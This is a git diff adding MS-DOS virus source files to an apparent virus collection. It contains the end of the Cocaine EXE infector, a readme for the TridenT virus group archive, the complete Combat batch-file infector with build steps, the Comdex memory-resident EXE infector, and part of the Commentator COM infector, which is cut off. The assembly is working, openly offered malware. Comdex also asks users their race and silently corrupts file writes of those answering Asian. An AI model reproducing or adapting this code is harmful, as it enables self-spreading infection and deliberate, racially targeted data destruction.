dx,[bp+eternal_love] ; the note + int 21 + jmp $ + +ret_to_host: + + lea dx,[bp+new_dta+2ch] ; Restore + mov ah,3bh ; directory + int 21 + + pop ds + mov dx,80 ; restore + mov ah,readin ; the DTA + int 21 + + Restore_To_Host: + push ds ; Restore ES/DS/PSP + pop es + + mov blast,es + add blast,10 + + add word ptr cs:[bp+CS_storage],blast + ; By current seg, adjust old CS + + cli ; Clear int's + add blast,word ptr cs:[bp+SS_storage] ; Old SS (adjust it) + mov ss,blast ; Original position + mov sp,word ptr cs:[bp+SP_storage] ; (return stack) + sti ; Store (?) int's + + db 0ea ; Jmp Far + IP_storage dw 0 ; Storage place for IP/CS/SP/SS + CS_storage dw 0 + SP_storage dw 0 + SS_storage dw 0 + + + IP_old dw 0 + CS_old dw 0fff0 + SP_old dw 0 + SS_old dw 0fff0 + + K_kool: + jmp no_more_files + K_spam: + jmp find_first_file + Save_Old_Header: + mov blast,word ptr [exe_header+bp+0e] ; Save SS (old) + mov word ptr [SS_old+bp],blast + mov blast,word ptr [exe_header+bp+10] ; Save SP (old) + mov word ptr [SP_old+bp],blast + mov blast,word ptr [exe_header+bp+14] ; Save IP (old) + mov word ptr [IP_old+bp],blast + mov blast,word ptr [exe_header+bp+16] ; Save CS (old) + mov word ptr [CS_old+bp],blast + ret + + calculate_CSIP: + push blast + mov blast,word ptr [exe_header+bp+8] ;Get header length + mov cl,brutal ;and convert it to + shl blast,cl ;bytes. + mov mate,blast + pop blast + + sub blast,mate ;Subtract from + sbb dx,RAVE ;file (header size) + + mov cl,0c ;Convert into segment + shl dx,cl ;address (DX) + mov cl,brutal + push blast + shr blast,cl + add dx,blast + shl blast,cl + pop mate + sub mate,blast + mov word ptr [exe_header+bp+14],mate + mov word ptr [exe_header+bp+16],dx ;Set CS:IP (new) + mov word ptr [exe_header+bp+0e],'RI' ;Set SS/CS (new) + mov word ptr [exe_header+bp+10],0fffe ;Set SP (new) + mov byte ptr [exe_header+bp+12],'?' ;mark infection + ret + + calculate_size: + push blast ;Save offset for later + + add blast,end_virus-start ; add size (virus) + adc dx,RAVE + + mov cl,POLICE + shl dx,cl ;convert to pages (DX) + mov cl,BRUTALITY + shr blast,cl + add blast,dx + inc blast + mov word ptr [exe_header+bp+SPAM],blast ; save pages (x number) + + pop blast ; get offset + mov dx,blast + shr blast,cl ; calcute last page + shl blast,cl ; (remainder) + sub dx,blast + mov word ptr [exe_header+bp+RUDE],dx ;save remainder + ret + + ch_dir: + mov ah,3bh ; Change + lea dx,[bp+dot_dot] ; up a dir + int 21 + jc no_more ; If root, outa here + jmp k_spam ; Else, try to infect here aswell + + no_more: + jmp k_kool + + blast equ ax + mate equ cx + police equ 7 + brutality equ 9 + rave equ 0 ; Hey! That's you :) + spam equ 04 + rude equ 02 + brutal equ 4 + readin equ 1a + svenne equ 40 + virnote db 'Cocaine [CoKe]' + db '(c) Metal Militia/Immortal Riot' + eternal_love db 0dh,0ah,'Love to LISA :)',0dh,0ah,'$' + db 'Cocaine''s running thrue your vains' + db 'It seems you have become an addict' + masker db '*IR.EXE',0 ;File mask used for search + dot_dot db '..',0 + end_virus: + exe_header db 1a dup (?) + New_DTA: + end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.collectn.txt b/MSDOS/Virus.MSDOS.Unknown.collectn.txt new file mode 100644 index 00000000..8e811517 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.collectn.txt @@ -0,0 +1,26 @@ + - TridenT - + +This is a collection of 100+ viruses, many of them with the original source +code. These viruses were created by the members of the Dutch virus writing +group TridenT. The collection is divided into seperate archives to cover the +individual members of the group: + + - Bit Addict + - Crom-Cruach + - Dark Helmet + - Darkray + - Masud Khafir + - Glen Benton later known as John Tardy + +Also included are the 4 versions of the TridenT Polymorphic Engine, +one of the first polymorphic engines used to create "undetectable" viruses, +and interviews with several of the members. Spread throughout the archives +are copies of viruses of TridenT "copy-cats" and "wannabees". + +Following "updates" to this collection will be minor since the "well" is +about dry. I must have waded thru 100+ Mb of files to get this far, there is +no more to find. + +Enjoy + +<-洝洜T狻X-|05/95> diff --git a/MSDOS/Virus.MSDOS.Unknown.combat.asm b/MSDOS/Virus.MSDOS.Unknown.combat.asm new file mode 100644 index 00000000..6e191b85 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.combat.asm @@ -0,0 +1,142 @@ +;=====( Combat virus by Rajaat )=============================================== +; +; Non-resident BAT infector, doesn't use external programs by third party. +; +;============================================================================== +; +; Virus name : Combat +; Author : Rajaat +; Origin : United Kingdom, July 1996 +; Compiling : Using TASM +; +; TASM /M COMBAT +; TLINK /T COMBAT +; REN COMBAT.COM COMBAT.BAT +; Targets : BAT files +; Size : Doesn't matter +; Resident : No +; Polymorphic : No +; Encrypted : No +; Stealth : No +; Tunneling : No +; Retrovirus : No +; Antiheuristics: No +; Peculiarities : It infects BAT files parasitically +; Drawbacks : It's a goddamn BAT infector, what do you think?!? +; Behaviour : No really, find out yourself! I was bored and made this, +; do you really think I'd spend time explaining what it DOES? +; It's unknown what this virus might do besides replicate :) +;============================================================================== +; +; Results with antivirus software +; +; TBFILE - Not tested +; TBSCAN - Not tested +; TBMEM - Not tested +; TBCLEAN - Not tested +; SVS - Not tested +; SSC - Not tested +; F-PROT - Not tested +; F-PROT /ANALYSE - Not tested +; F-PROT /ANALYSE /PARANOID - Not tested +; AVP - Not tested +; VSAFE - Not tested +; NEMESIS - Not tested +; +;============================================================================== + +.model tiny +.code +.radix 16 + +signature equ 5240 + + org 100 + +main: + db '@REM ',0ff + jmp com_entry + db ' * ComBat *' + db 0dh,0ah + db '@echo off',0dh,0ah + db 'goto ComBat',0dh,0ah + +com_entry: mov si,80 + cmp byte ptr ds:[si],0 + je no_check + cld +find_argument: inc si + lodsb + dec si + cmp al,20 + je find_argument + mov dx,si +find_end: lodsb + cmp al,0dh + jne find_end + mov byte ptr ds:[si-1],0 + push dx + mov ax,3d02 + int 21 + jc no_check + xchg ax,bx + lea dx,virus_end + mov ah,3f + mov cx,3 + int 21 + mov ah,3e + int 21 + pop dx + cmp word ptr virus_end,signature + je no_check + mov ax,4301 + xor cx,cx + int 21 + mov ah,3c + xor cx,cx + lea dx,temp_file + int 21 + jc no_check + xchg ax,bx + mov ah,40 + lea dx,main + mov cx,file_length + int 21 + mov ah,3e + int 21 + mov ax,4c00 + int 21 + + db 0,'Rajaat / Genesis',0 + +no_check: mov ax,4c01 + int 21 + +temp_file db 'ComBat.TMP',0 + +batch_2 db 0dh,0ah + db ':ComBat',0dh,0ah + db 'if #%_tmp%#==## goto no_call',0dh,0ah + db 'C:\ComBat.COM %1',0dh,0ah + db 'if errorlevel 1 goto done_ComBat',0dh,0ah + db 'type %1 >> ComBat.TMP',0dh,0ah + db 'echo. >> ComBat.TMP',0dh,0ah + db 'echo :done_ComBat >> ComBat.TMP',0dh,0ah + db 'copy ComBat.TMP %1 > nul',0dh,0ah + db 'del ComBat.TMP > nul',0dh,0ah + db 'goto done_ComBat',0dh,0ah + db ':no_call',0dh,0ah + db 'set _tmp=%0',0dh,0ah + db 'if #%_tmp%#==## set _tmp=AUTOEXEC.BAT',0dh,0ah + db 'if not exist %_tmp% set _tmp=%0.BAT',0dh,0ah + db 'if not exist %_tmp% goto path_error',0dh,0ah + db 'copy %_tmp% C:\ComBat.COM > nul',0dh,0ah + db 'for %%f in (*.bat c:\*.bat c:\dos\*.bat c:\windows\*.bat ..\*.bat) do call %_tmp% %%f',0dh,0ah + db 'del C:\ComBat.COM > nul',0dh,0ah + db ':path_error',0dh,0ah + db 'set _tmp=',0dh,0ah +file_length equ $-main +virus_end equ $ + db ':done_ComBat',0dh,0ah + +end main diff --git a/MSDOS/Virus.MSDOS.Unknown.comdex7.asm b/MSDOS/Virus.MSDOS.Unknown.comdex7.asm new file mode 100644 index 00000000..bad65b0d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comdex7.asm @@ -0,0 +1,805 @@ +; The Comdex exibit guide program +; For the Fall 1991 Comdex Las Vegas Convention +; +; +; A short description of the program: +; +; It only affects .exe files. +; Comdex attaches itself to the end of the programs it affects. +; +; When an affected file is run, Comdex copies itself to top of +; free memory, and modifies the memory blocks, in order to hide from +; memory mapping programs. Some programs may overwrite this area, +; causing the computer to crash. If this happens, the user obviously +; deserved it. +; +; Comdex will hook int 21h and when function 4b (exec) is called +; it sometimes will affect the program being run. It will check every +; program that is run for affection, and if it is not already +; affected, it will be. +; +; Comdex will, after 1 hr, one of 16 chance, ask your race or +; nationality prior to executing a file. Af you answer that you +; are asian/pacific rim, one of 256 file writes will have the +; length adjusted downward or the record size reduced, depending +; upon the specific dos call made. +; +; +; Comdex will remove the read-only attribute before trying to +; affect programs. +; +; Affected files can be easily recognized, since they always end in +; "COMD" +; +; To check for system affection, a byte at 0:33c is used - if it +; contains a 069h, Comdex is installed in memory. +; +; +comsiz equ 128 ;in paragraphs + +code segment para public 'code' + assume cs:code,ds:nothing,ss:nothing,es:nothing + +; +; Comdex is basically divided in the following parts. +; +; 1. the main program - run when an affected program is run. +; it will check if the system is already affected, and if not +; it will install Comdex. +; +; 2. the new int 17 handler. adjusts two ascii output chars. +; +; 3. the new int 14 handler. +; +; 4. the new int 8 handler. +; +; 5. the new int 9 handler. +; +; 6. the new int 21 handler. it will look for exec calls, and +; affect the program being run. +; +; +; this is a fake mcb (memory control block) +; ms-dos inspects the chain of mcbs whenever a memory block allocation, +; modification, or release function is requested, or when a program +; is execed or terminated... +; + db 'Z',00,00,comsiz,0,0,0,0,0,0,0,0,0,0,0,0 +; ^___ # of paragraphs of the controlled mem blk + + + +Comdex proc far +; +; Comdex starts by pushing the original start address on the stack, +; so it can transfer control there when finished. +; +labl: sub sp,4 + push bp + mov bp,sp + push ax +;following line nuked for ease of test +; nop ;added so that scan84 doesn't id as [ice-3] + mov ax,es +; +; put the the original cs on the stack. the add ax,data instruction +; is modified by Comdex when it affects other programs. +; + db 05h ;this is an add ax,10h +org_cs dw 0010h + mov [bp+4],ax +; +; put the the original ip on the stack. this mov [bp+2],data instruction +; is modified by Comdex when it affects other programs. +; + db 0c7h,46h,02h +org_ip dw 0000h +; +; save all registers that are modified. +; + push es + push ds + push bx + push cx + push si + push di +; +; check if already installed. quit if so. +; + mov ax,0 + mov es,ax ;zero es + cmp es:[33ch],byte ptr 069h +;&& +; jne l1 +; +; restore all registers and return to the original program. +; +exit: pop di + pop si + pop cx + pop bx + pop ds + pop es + pop ax + pop bp + retf +; +; Comdex tries to hide from detection by modifying the memory block it +; uses, so it seems to be a block that belongs to the operating system. +; +; it looks rather weird, but it seems to work. +; +l1: mov ah,52h + call int21 ;undefined dos call!!? + mov ax,es:[bx-2] + nop + mov es,ax + add ax,es:[0003] + inc ax + inc ax + mov cs:[0001],ax +; +; next, Comdex modifies the memory block of the affected program. +; it is made smaller, and no longer the last block. +; + mov bx,ds + dec bx + nop + mov ds,bx + mov al,'M' + mov ds:[0000],al + mov ax,ds:[0003] + sub ax,comsiz + mov ds:[0003],ax + add bx,ax + inc bx +; +; then Comdex moves itself to the new block. +; + mov es,bx + xor si,si + xor di,di + push cs + pop ds + mov cx,652h ;the length of this program - + ;be *sure* to update this!! + ;in fact, make it symbolic!! + cld + rep movsb +; +; Comdex then transfers control to the new copy of itself. +; + push es + nop + mov ax,offset l3 + push ax + retf + db 3dh ;confuse disassemblers +; +; zero some variables +; +l3: mov byte ptr cs:[min60],0 + mov byte ptr cs:[min50],0 + mov word ptr cs:[timer],0 + mov byte ptr cs:[input_char],0 +; +; set flag to confirm installation +; + xor ax,ax + mov es,ax + inc ax ;dummy operation to confuse function + mov byte ptr es:[33ch],069h +; +; hook interrupt 21: +; (the primary dos function interrupt) +; + mov ax,es:[0084h] + mov cs:[old21],ax + mov ax,es:[0086h] + nop + mov cs:[old21+2],ax + mov ax,cs + mov es:[0086h],ax + mov ax,offset new21 + mov es:[0084h],ax +; +; hook interrupt 17: +; (bios lpt services) +; + mov ax,es:[005ch] + mov cs:[old17],ax + nop + mov ax,es:[005eh] + mov cs:[old17+2],ax + inc ax ;dummy op + mov ax,cs + mov es:[005eh],ax + mov ax,offset new17 + mov es:[005ch],ax + +; +; hook interrupt 14: +; (bios serial port services) +; +; mov ax,es:[0050h] +; mov cs:[old17],ax +; mov ax,es:[0052h] +; mov cs:[old14+2],ax +; mov ax,cs +; mov es:[0052h],ax +; mov ax,offset new14 +; mov es:[0050h],ax +; +; +; + cmp word ptr cs:[noinf],5 + jg hook8 + jmp exit +; +; hook interrupt 9 +; (bios keyboard interrupt) +; +;hook9: mov ax,es:[0024h] +; mov cs:[old9],ax +; mov ax,es:[0026h] +; mov cs:[old9+2],ax +; mov ax,cs +; mov es:[0026h],ax +; mov ax,offset new9 +; mov es:[0024h],ax +; +; hook interrupt 8 +; (timer ticks) +; + db 3dh,0cch,03h,3dh,3dh ;confuse dissassemblers +hook8: mov ax,es:[0020h] + mov cs:[old8],ax + mov ax,es:[0022h] + mov cs:[old8+2],ax + mov ax,cs + nop + mov es:[0022h],ax + mov ax,offset new8 + mov es:[0020h],ax + jmp exit + + +;the int 21 calls go through this routine to confuse the issue: +int21: push ax + mov ax,0ffh + mov word ptr cs:[internal],ax ;set internal int 21 flag + mov al,20h + inc al ;put 21 in al + mov byte ptr cs:[int21b],al ;self modifying code! + pop ax + db 0cdh ;int opcode +int21b: db 0cch ;overwritten to int 21h + push ax + mov ax,00 + mov word ptr cs:[internal],ax ;clear internal int 21 flag + mov ax,0cch + mov byte ptr cs:[int21b],al ;nuke it back to int 0cch + pop ax + retn + + + + db "Welcome to Comdex " + db "From the Interface Group, Inc. " + db "300 First Avenue " + db "Needham, MA 02194 " + db "(617)449-6600 " + db "For data recovery ask for " + db "Peter J. Bowes, unless you are " + db "Oriental, in which case, we will " + db "not help you. " + +quest db 0dh,0ah,"Software Piracy Prevention Center",0dh,0ah + db "requests your cooperation:",0dh,0ah,0dh,0ah + db "Please enter your race or nationality:",0dh,0ah + db "a. White e. Eastern European",0dh,0ah + db "b. Black f. Soviet",0dh,0ah + db "c. Hispanic g. Western European",0dh,0ah + db "d. Asian/Pacific Rim h. Other",0dh,0ah,0dh,0ah + db " Please enter your response: ","$" + +input_char: db 0 + db 3dh ;confuse disassemblers + +askit: push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + cmp byte ptr cs:[min60],1 ;resident 1 hr yet? + jnz noask + cmp byte ptr cs:[input_char],0 + jnz noask ;don't ask twice + mov ax,word ptr cs:[timer] + and ax,000fh ;look at ls free running clock + cmp ax,000ch ;does it happen to be 00ch? (1 of 16) + jnz noask ;if not, don't ask the guy! + + mov dx,offset quest ;ask the guy about race + mov ah,09h ;dos string print + push cs + pop ds + call int21 ;print question on crt + mov ax,0c01h ;dos flush input and get char + call int21 ;get char + and al,0dfh ;force upper case + mov byte ptr cs:[input_char],al ;save away response +noask: pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retn + +;******************************************************************** + +; +; int 9 (keyboard) replacement: +; this routine does not become active until 50 minutes after +; the execution of an affected program. +; +;new9: push ax +; push es +; cmp byte ptr cs:[min50],1 +; jnz retx1 + +;insert any code here that activates 50 min after launch for int 9... + +;retx1: pop es ;prepare to go to old int 9 code: +; pop ax +; db 0eah ;jmp 0000:0000 nmemonic +;old9 dw 0,0 ;storage for old addr + + +;******************************************************************** +; +; new int 14 (serial port) routine - +; +;new14: cmp ah,1 ;is it an output request? +; jz s1 ;yup. don't return just yet. +;do14: db 0eah ;jmp 0000:0000 nmemonic +;old14 dw 0,0 +;s1: + +;insert any code here for output to serial port... + +; jmp do14 + + +;******************************************************************** +; +; new int 8 routine (bios timer ticks) +; + db 3dh ;piss off disassemblers +new8: push dx + push cx + push bx + push ax + jmp txex ;&& + inc word ptr cs:[timer] ; increment timer + cmp byte ptr cs:[min60],01 ; if counter >= 60 min. + jz tt0 ; no need to check any more + cmp word ptr cs:[timer],-11 ; 60 minutes ? + jz tt1 + cmp word ptr cs:[timer],54601 ; 50 minutes ? + jz tt2 + jmp txex +; +; 50 minutes after an affected program is run the flag is set. +; +tt2: mov byte ptr cs:[min50],1 + jmp txex +; +; 60 minutes after an affected program is run this flag is set. +; +tt1: mov byte ptr cs:[min60],1 + +; exit interrupt routine: + + jmp txex +; +; every time an int 8 occurs, after the 60 min. have passed, we +; end up here: +; +tt0: +;insert any fun timer oriented code here +; +; restore registers and quit +; +txex: pop ax + pop bx + pop cx + pop dx + db 0eah +old8 dw 0,0 + +;******************************************************************** +; +; new int 17 routine. lpt out stuff. +; +new17: jmp do17 ;&& + cmp ah,0 + + jz p0 +do17: db 0eah +old17 dw 0,0 + db 2eh ;confuse disassemblers +p0: cmp byte ptr cs:[input_char],44h ;d. asian/pacific rim? + jne not_asian + push ax + mov ax,word ptr cs:[timer] + and ax,00ffh + cmp ax,0032h ; one of 256 odds + pop ax ; restore ax, doesn't change flags + jne do17 ; don't twiddle lpt 255/256 odds + cmp al,55h ; printing a "U"? + jne notu + mov al,0efh ; make it upside-down! + jmp do17 ; and continue. +notu: cmp al,06fh ; lower case "o"? + jne do17 ; no? then exit. + mov al,093h ; make it an "o" with a ^ over it! + jmp do17 ; and exit. +not_asian: + jmp do17 + + +;Int 21 file adjustment routines - the following routines corrupt a small +;percentage of the file writes that Asians do in their use of the pc. For +;example, when one updates a spreadsheet or exits a word processor, the +;application software will re-write the file out to disk. What we do here +;is reduce the amount of the data that is written to the file. The hope +;is that the problem will be hidden for a significant period of time, since +;it happens only infrequently, and since it typically will happen upon exit +;of the application package. If the reduction of the write causes a serious +;problem (we hope it will) it won't usually be noticed until that file is +;loaded again. The other hope is that if the user does backup his data from +;time to time, this corrupted data will end up on the backup as well before +;the problem is noticed. With luck, maybe the user will assume that the +;hardware is intermittent, and backup the system over the top of his only +;existing backup set, then purchase replacement hardware. + + + +fuck_size_f: ;if asian, reduce file rec size by 1 on fcb ops + push ax + push di + push dx ;setup di for indexed operations + pop di + cmp byte ptr cs:[input_char],044h ;asian? + jne exit_fuck_f ;no, then do nothing + mov ax,word ptr cs:[timer] + and ax,00ffh ;mask off ls 8 bits of free run timer + cmp ax,0069h ;does it happen to be 69h? (1 of 256) + jne exit_fuck_f ;nope, so do nothing + + mov al,[ds:di+0] ;get first byte of user's fcb + cmp al,0ffh ;extended fcb? + jne norm_fcb ;nope, so handle as normal fcb + mov ax,[ds:di+15h] ;get record size, 16 bits on extd fcb. + dec ax ;adjust it a bit, since the user really doesn't + ;need to write so much data. + mov [ds:di+15h],ax + jmp exit_fuck_f ;subsequent r/w ops should fail to get the + ;right data until this file is closed or + ;until system crashes. + +norm_fcb: + mov al,[ds:di+0eh] ;get record size, only 8 bits on norm fcb. + dec al ;reduce by 1 + mov [ds:di+0eh],al ;store it back +exit_fuck_f: + pop di + pop ax + jmp do21 + + +fuck_size_h: ;reduce length of handle file writes + push ax + push di + push dx + pop di + cmp byte ptr cs:[input_char],044h ;asian? + jne exit_fuck_h ;no, so don't damage anything. + mov ax,word ptr cs:[timer] + and ax,00ffh + cmp ax,0066h ;one out of 256 odds + jne try_again ;no? well give it another chance. + and cx,0fff5h ;reduce write length in bytes by a flakey amt + dec cx ;ranging from 1 to 11 bytes. +exit_fuck_h: + pop ax + jmp do21 + +try_again: + cmp ax,0077h ;one of 256 odds? + jne exit_fuck_h ;exit if not lucky. + mov ax,[ds:di+30h] ;get a user data byte from his buffer + xor ax,0004h ;toggle bit 2 of byte 30h + mov [ds:di+30h],ax ;and put it back + jmp exit_fuck_h + +;******************************************************************** +; +; this is the int 21 replacement. it only does something in +; the case of an execute program dos call. +; +;be careful here not to trap int codes that we use internally! +new21: jmp do21 ;&& + push ax + cmp word ptr cs:[internal],0ffh ;is it an internal int 21? + je do21 ;yup, so no tweaking allowed + pop ax + cmp ah,015h ;is it a fcb file write? + je fuck_size_f ;if asian, reduce record size by 1 + cmp ah,040h ;is it a handle file write? + je fuck_size_h ;if asian, adjust write length down. + cmp ah,4bh ;is it an int 21 code 4b? + je l5 ;yup. go affect stuff +do21: db 0eah ;nope. let dos handle it +old21 dw 0,0 +; +; the code to only affect every tenth program has been removed +; for now. restore this code later. +; + db 3dh ;confuse disassemblers +l5: call askit ;ask race if appropriate + push ax + push bx + push cx + push dx + push si + push ds +; +; search for the file name extension ... +; + mov bx,dx +l6: inc bx + cmp byte ptr [bx],'.' + je l8 + cmp byte ptr [bx],0 + jne l6 +; +; ... and quit unless it starts with "ex". +; +l7: pop ds + pop si + pop dx + pop cx + pop bx + pop ax + jmp do21 +l8: inc bx + cmp word ptr [bx],5845h ;"EX" + jne l7 +; +; when an .exe file is found, Comdex starts by turning off +; the read-only attribute. the read-only attribute is not restored +; when the file has been affected. +; + mov ax,4300h ; get attribute + call int21 + jc l7 + mov ax,4301h ; set attribute + and cx,0feh + call int21 + jc l7 +; +; next, the file is examined to see if it is already affected. +; the signature (4418 5f19) is stored in the last two words. +; + mov ax,3d02h ; open / write access + call int21 + jc l7 + mov bx,ax ; file handle in bx +; +; this part of the code is new: get date of file. +; + mov ax,5700h + call int21 + jc l9 + mov cs:[date1],dx + mov cs:[date2],cx +; + push cs ; now ds is no longer needed + pop ds +; +; the header of the file is read in at [id+8]. Comdex then +; modifies itself, according to the information stored in the +; header. (the original cs and ip addressed are stored). +; + mov dx,offset id+8 + mov cx,1ch + mov ah,3fh + call int21 + jc l9 + mov ax,ds:id[1ch] + mov ds:[org_ip],ax + inc ax ;confuse reader a little + mov ax,ds:id[1eh] + add ax,10h + mov ds:[org_cs],ax +; +; next the read/write pointer is moved to the end of the file-4, +; and the last 4 bytes read. they are compared to the signature, +; and if equal nothing happens. +; + mov ax,4202h + mov cx,-1 + mov dx,-4 + call int21 + jc l9 + add ax,4 + mov ds:[len_lo],ax + jnc l8a + inc dx +l8a: mov ds:[len_hi],dx +; +; this part of Comdex is new - check if it is below minimum length +; + cmp dx,0 + jne l8b + mov cl,13 + shr ax,cl + cmp ax,0 + jg l8b + nop + jmp short l9 +l8b: mov ah,3fh + mov cx,4 + mov dx,offset id+4 + call int21 + jnc l11 +l9: mov ah,3eh + call int21 +l10: jmp l7 + db 3eh ;confuse disassemblers +; +; compare to 4f43,444d which is first 4 letters of Comdex +; +l11: mov si,offset id+4 + mov ax,[si] + cmp ax,4f43h ;ascii "OC" + jne l12 + mov ax,[si+2] + cmp ax,444dh ;ascii "DM" + je l9 +; +; the file is not affected, so the next thing Comdex does is +; affect it. first it is padded so the length becomes a multiple +; of 16 bytes. this is done so Comdex code can start at a +; paragraph boundary. +; +l12: mov ax,ds:[len_lo] + and ax,0fh + jz l13 + mov cx,16 + sub cx,ax + nop + add ds:[len_lo],cx + jnc l12a + inc ds:[len_hi] +l12a: mov ah,40h + call int21 ;dos write to file + jc l9 +; +; next the main body of Comdex is written to the end. +; +l13: xor dx,dx + mov cx,offset id + 4 + mov ah,40h ;dos write to file + call int21 + jc l9 +; +; next the .exe file header is modified: +; +; first modify initial ip +; +f0: mov ax,offset labl + mov ds:id[1ch],ax +; +; modify starting cs = Comdex cs. it is computed as: +; +; (original length of file+padding)/16 - start of load module +; + mov dx,ds:[len_hi] + mov ax,ds:[len_lo] + mov cl,cs:[const1] ; modified a bit + shr dx,cl + rcr ax,cl + nop + shr dx,cl + rcr ax,cl + shr dx,cl + rcr ax,cl + nop + shr dx,cl + rcr ax,cl + sub ax,ds:id[10h] + mov ds:id[1eh],ax +; +; modify length mod 512 +; + add ds:[len_lo],offset id+4 + jnc l14 + inc ds:[len_hi] +l14: mov ax,ds:[len_lo] + and ax,511 + nop + mov ds:id[0ah],ax +; +; modify number of blocks used +; + mov dx,ds:[len_hi] + mov ax,ds:[len_lo] + add ax,511 + jnc l14a + inc dx +l14a: mov al,ah + mov ah,dl + shr ax,1 + mov ds:id[0ch],ax +; +; finally the modified header is written back to the start of the +; file. +; +wrtback:mov ax,4200h + xor cx,cx + xor dx,dx + call int21 ;dos move file pointer + jc endit + mov ah,40h + mov dx,offset id+8 + mov cx,1ch + call int21 ;dos write to file +; +; this part is new: restore old date. +; + mov dx,cs:[date1] + mov cx,cs:[date2] + mov ax,5701h + call int21 ;dos set file date and time + jc endit + inc word ptr cs:[noinf] +; +; affection is finished - close the file and execute it +; +endit: jmp l9 +; +; + +timer dw 0 ; number of timer (int 8) ticks +const1 db 1 ; the constant 1 +const0 dw 0 ; the constant 0 +internal dw 0 ; internal int 21 in effect. +min50 db 0 ; flag, set to 1 50 minutes after execution +min60 db 0 ; flag, set to 1 60 minutes after execution +vmode db 0 ; video mode +date1 dw ? ; date of file +date2 dw ? ; ditto. +len_lo dw ? +len_hi dw ? +noinf dw 0 ; number of affections +id label word + db "COMD" ; the signature of Comdex. +; +; a buffer, used for data from the file. +; + +Comdex endp +code ends + + end labl + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.comment1.asm b/MSDOS/Virus.MSDOS.Unknown.comment1.asm new file mode 100644 index 00000000..96f0f6a9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comment1.asm @@ -0,0 +1,334 @@ +;谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Commentator Virus by Glenn... +;媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This will be a Parasytic Non-Resident .COM infector. +; It will also infect COMMAND.COM. +;滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +.MODEL TINY + +Public VirLen,MovLen + +Code Segment para 'Code' +Assume Cs:Code,Ds:Code,Es:Code + + Org 100h + +Signature Equ 0DaDah ; Signature of virus! + +Buff1 Equ 0F100h +Buff2 Equ Buff1+2 +VirLen Equ Offset Einde-Offset Begin +MovLen Equ Offset Einde-Offset Mover +DTA Equ 0F000h +Proggie Equ DTA+1Eh +Lenny Equ DTA+1Ah + +MinLen Equ Virlen ;Minimale lengte te besmetten programma +MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This part will contain the actual virus code, for searching the +; next victim and infection of it. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +Begin: + Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk + DW Signature ; Herkenningsteken virus +Oversig: + Pushf ;------------------ + Push AX ; Alle registers opslaan voor + Push BX ; later gebruik van het programma + Push CX ; + Push DX ; + Push DS ; + Push ES ; + Push SS ; + Push SI ; + Push DI ;------------------ +InfectPart: + Mov AX,Sprong ;------------------ + Mov Buf1,AX ; Spronggegevens bewaren om + Mov BX,Source ; besmette programma te starten + Mov Buf2,BX ;------------------ + Mov AH,1Ah ; DTA area instellen op + Mov DX,DTA ; $DTA area + Int 21h ;------------------ +Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory + Mov Cx,1 ; + Lea DX,FindPath ; + Int 21h ;------------------ + Jnc KijkInfected ; Geen gevonden, goto Afgelopen + Jmp Afgelopen ;------------------ +KijkInfected: + Mov DX,Cs:[Lenny] ;------------------ + Cmp DX,MinLen ; Kijken of programmalengte voldoet + Jb ZoekNext ; aan de eisen van het virus + Cmp DX,MaxLen ; + Ja ZoekNext ;------------------ +On2: Mov AH,3Dh ; Zo ja , file openen en file handle + Mov AL,2 ; opslaan + Mov DX,Proggie ; + Int 21h ; + Mov FH,AX ;------------------ + Mov BX,AX ; + Mov AH,3Fh ; Lezen 1e 4 bytes van een file met + Mov CX,4 ; een mogelijk kenmerk van het virus + Mov DX,Buff1 ; + Int 21h ;------------------ +Sluiten: Mov AH,3Eh ; File weer sluiten + Int 21h ;------------------ + Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 + Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op + Jnz Infect ; morgoth virus. Als bestand al besmet +ZoekNext: + Mov AH,4Fh ;------------------ + Int 21h ; Zoeken naar volgende .COM file + Jnc KijkInfected ; Geen gevonden, goto Afgelopen + Jmp Afgelopen ;------------------ +Infect: + Mov DX,Proggie ; beveiliging weghalen + Mov AH,43h ; + Mov AL,1 ; + Xor CX,Cx + Int 21h ;------------------ + Mov AH,3Dh ; Bestand openen + Mov AL,2 ; + Mov DX,Proggie ; + Int 21h ;------------------ + Mov FH,AX ; Opslaan op stack van + Mov BX,AX ; datum voor later gebruik + Mov AH,57H ; + Mov AL,0 ; + Int 21h ; + Push CX ; + Push DX ;------------------ + Mov AH,3Fh ; Inlezen van eerste deel van het + Mov CX,VirLen+2 ; programma om later terug te + Mov DX,Buff1 ; kunnen plaatsen. + Int 21h ;------------------ + Mov AH,42H ; File Pointer weer naar het + Mov AL,2 ; einde van het programma + Xor CX,CX ; zetten + Xor DX,DX ; + Int 21h ;------------------ + Xor DX,DX ; Bepalen van de variabele sprongen + Add AX,100h ; in het virus (move-routine) + Mov Sprong,AX ; + Add AX,MovLen ; + Mov Source,AX ;------------------ + Mov AH,40H ; Move routine bewaren aan + Mov DX,Offset Mover ; einde van file + Mov CX,MovLen ; + Int 21h ;------------------ + Mov AH,40H ; Eerste deel programma aan- + Mov DX,Buff1 ; voegen na Move routine + Mov CX,VirLen ; + Int 21h ;------------------ + Mov AH,42h ; File Pointer weer naar + Mov AL,0 ; het begin van file + Xor CX,CX ; sturen + Xor DX,DX ; + Int 21h ;------------------ + Mov 